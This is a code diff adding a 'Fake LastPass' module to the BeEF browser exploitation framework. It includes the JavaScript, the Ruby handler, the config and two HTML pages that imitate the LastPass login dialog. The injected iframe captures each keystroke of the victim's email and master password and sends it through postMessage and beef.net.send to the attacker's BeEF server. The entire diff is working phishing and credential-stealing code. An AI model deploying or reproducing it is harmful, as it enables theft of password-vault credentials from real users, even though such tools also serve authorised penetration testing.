New Module - Fake LastPass Dialog

modules/social_engineering/fake_lastpass/command.js

@@ -0,0 +1,39 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	// Prepare the onmessage event handling
+	var eventMethod = window.addEventListener ? "addEventListener" : "attachEvent";
+	var eventer = window[eventMethod];
+	var messageEvent = eventMethod == "attachEvent" ? "onmessage" : "message";
+	eventer(messageEvent,function(e) {
+		if (e.data == "KILLFRAME") {
+			beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Killing Frame');	
+			beef.net.send('<%= @command_url %>', <%= @command_id %>, 'meta=KILLFRAME');	
+			beef.dom.removeElement('LPIFRAME');
+			return;
+		} else {
+			beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=' + e.data);	
+		}
+	},false);	
+
+	if (beef.browser.isC()) {
+		beef.dom.createIframe('custom','get',{'src':beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/lp/index.html','id':'LPIFRAME'}, {'width':'375px','height':'415px','position':'fixed','right':'0px','top':'0px','z-index':beef.dom.getHighestZindex()+1,'border':'1px solid white','overflow':'hidden'}); 
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Chrome IFrame Created .. awaiting messages');	
+	} else {
+		// Don't know how NON Chrome browsers look - so just going to pop the FF dialog
+		beef.dom.createIframe('custom','get',{'src':beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/lp/indexFF.html','id':'LPIFRAME'}, {'width':'280px','height':'345px','position':'fixed','left':(($j(window).width()/2)-140)+'px','top':'0px','z-index':beef.dom.getHighestZindex()+1,'border':'0px solid black','overflow':'hidden'}); 
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Non-Chrome IFrame Created .. awaiting messages');	
+	}
+
+	// $j('body').append("<div id='lp_login_dia' style='width:375px; height:415px; position: fixed; right: 0px; top: 0px; z-index: "+beef.dom.getHighestZindex()+1+"; border: 1px solid white; overflow: hidden; display: none'></div>");
+
+	// $j('#lp_login_dia').load(beef.net.httpproto+"://"+beef.net.host+":"+beef.net.port+"/lp/index.html");
+
+
+
+});

modules/social_engineering/fake_lastpass/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        fake_lastpass:
+            enable: true
+            category: "Social Engineering"
+            name: "Fake LastPass"
+            description: "Displays a fake LastPass user dialog."
+            authors: ["xntrik"]
+            target:
+                user_notify: ['ALL']

modules/social_engineering/fake_lastpass/index.html

@@ -0,0 +1,188 @@
+<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/><meta http-equiv="Pragma" CONTENT="no-cache"><meta http-equiv="Expires" CONTENT="0"><meta http-equiv="CACHE-CONTROL" CONTENT="no-cache">
+<style type="text/css">
+body { font-family: Helvetica,Arial;
+color:white;}
+
+#_docwrite_login_small7 { white-space:normal; width:258px !important; display:inline-block; }
+#showvault { vertical-align: top; }
+
+/* General */
+.clear         {clear:both;font-size:0;height:0;line-height:0;overflow:hidden;}
+
+table td       {
+	padding-right:10px;
+	white-space:nowrap;
+}
+
+
+	
+.dropStyle {
+  border:thin solid white;
+background: #919191 !important; /* for non-css3 browsers */
+  background: -webkit-gradient(linear, left top, left bottom, from(#a9a9a9), to(#7a7a7a)); /* for webkit browsers */
+  font-weight: bold;
+  color: #e7e5e5;
+  position:absolute;
+  cursor:default;
+  text-align:left;
+  font-size:12px;
+  z-index:10000;
+  height:120px;
+  overflow:auto;
+  }
+.item {
+}
+.focus {
+background: #0399d4 !important; /* for non-css3 browsers */
+	background: -webkit-gradient(linear, left top, left bottom, from(#04acec), to(#0186ba)) !important; /* for webkit browsers */
+	color: #fff !important;
+	-webkit-border-radius: 0;
+	-moz-border-radius: 0;
+	text-shadow: 0 1px 1px rgba(0, 0, 0, .1);
+	cursor:hand
+}
+
+.item[aria-disabled="true"] {
+  color: grey;
+}
+.offscreen {
+   position: absolute;
+  left: -9000px;
+  width: 0;
+  overflow: hidden;
+}
+
+body { padding:20px 10px 0px 50px; font:13px/150% Helvetica, Arial, Tahoma, sans-serif; }
+
+body{
+	background:url('q3Jrp.png') repeat;
+}
+
+.logintitle{
+font-size:16px; font-weight:bold; 
+text-shadow:1px 1px 2px #858585
+}
+
+/**.css3button { background-image:url(images/menu_btnsmall.png); height:30px; width:95px; line-height:30px; font-size:12px; color:white; text-align:center;
+cursor:hand;
+font-weight:bold;
+text-shadow:1px 1px 2px #858585}
+.css3button:hover { background-image:url(images/menuroll_btnsmall.png); cursor:hand; } **/
+
+.css3button {
+	font-family: Helvetica, Arial, sans-serif; font-weight:bold;
+	font-size: 14px;
+	color: #ffffff;
+	padding: 2px 15px;
+	background: -webkit-linear-gradient(top, rgba(32,188,232,1) 0%,rgba(0,119,232,1) 100%);
+	-webkit-border-radius: 30px;
+	border: 2px solid #ffffff;
+	-webkit-box-shadow:
+		0px 3px 11px rgba(000,000,000,0.5),
+		inset 0px 0px 1px rgba(005,000,004,1);
+	text-shadow:
+		0px -1px 0px rgba(000,000,000,0.2),
+		0px 1px 0px rgba(255,255,255,0.3);
+}
+
+.css3button:hover {
+	cursor:hand;
+	 background:-webkit-gradient(linear, left top, left bottom, color-stop(0%,#158aff), color-stop(44%,#0b7ef1), color-stop(100%,#126eca));
+}
+
+/** text area input with shadow **/
+
+
+.textarea { 
+	-webkit-transition: all 0.30s ease-in-out;
+	padding-left: 7px;
+	width:200px;
+	border: solid 1px #E5E5E5;
+	outline: 0;
+	font: normal 13px/100% Helvetica, Arial, Tahoma, sans-serif;
+	box-shadow: rgba(0,0,0, 0.1) 0px 0px 8px;
+	-moz-box-shadow: rgba(0,0,0, 0.1) 0px 0px 8px;
+	-webkit-box-shadow: inset 1 3px 1 hsla(0,0%,0%,0.1);
+	-webkit-border-radius: 10px;
+	}
+	
+checkbox {
+	padding: 4px;
+	}
+
+
+/** input focus darkening **/
+
+/*
+.textarea:hover, .textarea:focus { 
+	border-color: #C9C9C9; 
+	-webkit-box-shadow: 0px 0px 5px 2px #3d8bff;
+	}
+*/
+
+.glow { 
+	border-color: #C9C9C9; 
+   	-webkit-box-shadow:0 0 1px 3px hsla(210,100%,50%,0.8), 0 1px 0 hsla(0,0%,100%,0.3);
+
+	}
+
+
+.form label { 
+	margin-left: 10px; 
+	color: #999999;
+	font-weight:bold; 
+	}
+
+a:link, a:active {
+	font-weight : bold;
+	font-size : 12px;
+	font-family : helvetica;
+	color :white;
+	text-decoration : none;
+	padding-left:10px
+	}
+	
+	a:hover {
+		font-weight : bold;
+		font-size : 12px;
+		font-family : helvetica;
+		color : #09F;
+		text-decoration : none;
+		}
+		
+</style>
+<script src="jquery.js" type="text/javascript"></script>
+<script>
+$(document).ready(function() {
+	$('#u').keyup(function() {
+		parent.postMessage('Username field changed to: ' + $('#u').val(),'*');
+	});
+
+	$('#p').keyup(function() {
+		parent.postMessage('Password field changed to: ' + $('#p').val(),'*');
+	});
+
+	$('#rememberemail').change(function() {
+		parent.postMessage('Remember Email changed to: ' + $('#rememberemail').prop('checked'),'*');
+	});
+
+	$('#rememberpassword').change(function() {
+		parent.postMessage('Remember Password changed to: ' + $('#rememberpassword').prop('checked'),'*');
+	});
+
+	$('#showvault').change(function() {
+		parent.postMessage('Show Vault changed to: ' + $('#showvault').prop('checked'),'*');
+	});
+
+	$('#login,#cancel,#forgot,#screenkeyboard,#createaccount').click(function() {
+		parent.postMessage('Button Clicked - username field: ' + $('#u').val() + '; password field: ' + $('#p').val(),'*');
+		parent.postMessage('KILLFRAME','*');
+	});
+
+});
+
+</script>
+</head><body><img src='lpwhite_small.png'/><p><div id="reprompttext" style="display: none;"><br><span id="_docwrite_login_small1"></span><br><br></div><div id="nodbtext" style="display: none; color: red;"><br><b><span id="_docwrite_login_small2"></span></b><br><br></div>
+<form id='f'><table><tr><td class='logintitle'><span id="_docwrite_login_small3">Email</span></td></tr><tr><td><input type='text' id='u' class='textarea' name='username' value=''/>&nbsp;&nbsp;<img id="deleteicon" src="xsmall.png" valign="middle"></td></tr><tr><td class='logintitle'><span id="_docwrite_login_small4">Password</span></td></tr><tr><td><input type='password' class='textarea' id='p' name='password'/></td></tr><tr id="rememberemailrow"><td><input type='checkbox' name='rememberemail' id='rememberemail'/>&nbsp;&nbsp;<label for="rememberemail"><span id="_docwrite_login_small5">Remember Email</span></label></td></tr><tr id="rememberpasswordrow"><td><input type='checkbox' name='rememberpassword' id='rememberpassword'/>&nbsp;&nbsp;<label for="rememberpassword"><span id="_docwrite_login_small6">Remember Password</span></label></td></tr><tr id="showvaultrow"><td><input type='checkbox' name='showvault' id='showvault'/>&nbsp;&nbsp;<label for="showvault"><span id="_docwrite_login_small7">Show Vault After Login</span></label></td></tr><tr id="donotrepromptforrow" style="display: none;"><td>&nbsp;</td><td><input type='checkbox' name='donotrepromptfor' id='donotrepromptfor'/>&nbsp;&nbsp;<label for="donotrepromptfor"><span id="_docwrite_login_small8"></span></label><select id="donotrepromptforsecs"><option value="0"></option><option value="30" id="_docwrite_login_small9"></option><option value="60" id="_docwrite_login_small10"></option><option value="300" id="_docwrite_login_small11"></option><option value="900" id="_docwrite_login_small12"></option><option value="1800" id="_docwrite_login_small13"></option><option value="3600" id="_docwrite_login_small14"></option><option value="10800" id="_docwrite_login_small15"></option><option value="21600" id="_docwrite_login_small16"></option><option value="43200" id="_docwrite_login_small17"></option><option value="86400" id="_docwrite_login_small18"></option></select></td></tr><div id='btnrow' class='btnrow'><table class='buttontable'><tr><td><div class='css3button' id='login'/><span id="_docwrite_login_small19">Login</span></div></div></td><td><div class='css3button' id='cancel'/><span id="_docwrite_login_small20">Cancel</span></div></td></tr></table></div></td></table></table></form><div id='links'><span id="forgotcontainer"><img src="key_small.png"><a id='forgot' href='#'><span id="_docwrite_login_small21">I forgot my password, Help</span></a><br/></span><span id="screenkeyboardcontainer"><img src="screenkeyboard.png"><a id='screenkeyboard' href='#'><span id="_docwrite_login_small22">Screen Keyboard</span></a><br/></span><span id="createaccountcontainer"><img src="create_small.png"><a id='createaccount' href='#'><span id="_docwrite_login_small23">Create Account</span></a><br/></span></div><div id='error'></div>
+
+</body></html>

modules/social_engineering/fake_lastpass/indexFF.html

@@ -0,0 +1,72 @@
+<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/><meta http-equiv="Pragma" CONTENT="no-cache"><meta http-equiv="Expires" CONTENT="0"><meta http-equiv="CACHE-CONTROL" CONTENT="no-cache">
+<style type="text/css">
+body { font-family: Helvetica,Arial;
+color:-moz-DialogText;
+background-color: #ededed;
+font: message-box;
+}
+
+
+</style>
+<script src="jquery.js" type="text/javascript"></script>
+<script>
+$(document).ready(function() {
+	$('#u').keyup(function() {
+		parent.postMessage('Username field changed to: ' + $('#u').val(),'*');
+	});
+
+	$('#p').keyup(function() {
+		parent.postMessage('Password field changed to: ' + $('#p').val(),'*');
+	});
+
+	$('#rememberemail').change(function() {
+		parent.postMessage('Remember Email changed to: ' + $('#rememberemail').prop('checked'),'*');
+	});
+
+	$('#rememberpassword').change(function() {
+		parent.postMessage('Remember Password changed to: ' + $('#rememberpassword').prop('checked'),'*');
+	});
+
+	$('#showvault').change(function() {
+		parent.postMessage('Show Vault changed to: ' + $('#showvault').prop('checked'),'*');
+	});
+
+	$('#disableffpwd').change(function() {
+		parent.postMessage('Disable FF Password Management changed to: ' + $('disableffpwd').prop('checked'),'*');
+	});
+
+	$('#login,#cancel,#forgot,#screenkeyboard,#createaccount').click(function() {
+		parent.postMessage('Button Clicked - username field: ' + $('#u').val() + '; password field: ' + $('#p').val(),'*');
+		parent.postMessage('KILLFRAME','*');
+	});
+
+});
+
+</script>
+</head><body>
+
+<div style="text-align: center; padding-bottom:5px"><img src="icon.png" /></div>
+<form>
+<div style="text-align: center">
+	<div style="text-align: left; padding-bottom:5px">Email</div>
+	<div style="text-align: left; padding-bottom:5px"><input type="text" style="width:245px;height:20px" id='u' /></div>
+	<div style="text-align: left; padding-bottom:5px">Master Password</div>
+	<div style="text-align: left; padding-bottom:5px"><input type="password" style="width:245px;height:20px" id='p' /></div>
+	<div style="text-align: left; padding-bottom:5px"><input type="checkbox" checked="checked" id='rememberemail'>Remember Email</input></div>
+	<div style="text-align: left; padding-bottom:5px"><input type="checkbox" id='rememberpassword'>Remember Password</input></div>
+	<div style="text-align: left; padding-bottom:5px"><input type="checkbox" checked="checked" id='showvault'>Show My LastPass Vault After Login</input></div>
+	<div style="text-align: left; padding-bottom:10px"><input type="checkbox" checked="checked" id='disableffpwd'>Disable Insecure Firefox Password Management</input></div>
+</div>
+
+<div style="text-align:center; padding-bottom:5px">
+	<div style="text-align:left; padding-bottom: 5px"><a href="#" style="text-decoration: none" id='forgot'>I forgot my password, Help!</a></div>
+	<div style="text-align:left; padding-bottom: 10px"><a href="#" style="text-decoration: none" id='screenkeyboard'>Screen Keyboard</a> &nbsp;&nbsp; <a href="#" style="text-decoration: none" id='createaccount'>Create an Account</a></div>
+</div>
+
+<div style="text-align:right">
+	<input type="button" value="Cancel" style="width:77px; height:21px" id='cancel' /> <input type="button" value="Login" style="width:77px; height:21px" id='login' />
+</div>
+</form>
+
+
+</body></html>

modules/social_engineering/fake_lastpass/module.rb

@@ -0,0 +1,43 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Fake_lastpass < BeEF::Core::Command
+  
+  def pre_send
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/index.html','/lp/index','html')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/indexFF.html','/lp/indexFF','html')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/key_small.png','/lp/key_small','png')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/lpwhite_small.png','/lp/lpwhite_small','png')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/q3Jrp.png','/lp/q3Jrp','png')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/screenkeyboard.png','/lp/screenkeyboard','png')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/xsmall.png','/lp/xsmall','png')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/create_small.png','/lp/create_small','png')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/icon.png','/lp/icon','png')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/jquery-1.5.2.min.js','/lp/jquery','js')
+  end
+  
+  #
+  # This method is being called when a zombie sends some
+  # data back to the framework.
+  #
+  def post_execute
+    if (@datastore['meta'] == "KILLFRAME") 
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/index.html')
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/indexFF.html')
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/key_small.png')
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/lpwhite_small.png')
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/q3Jrp.png')
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/screenkeyboard.png')
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/xsmall.png') 
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/create_small.png') 
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/icon.png') 
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/jquery.js') 
+    end
+    content = {}
+    content['result'] = @datastore['result']
+    save content
+  end
+  
+end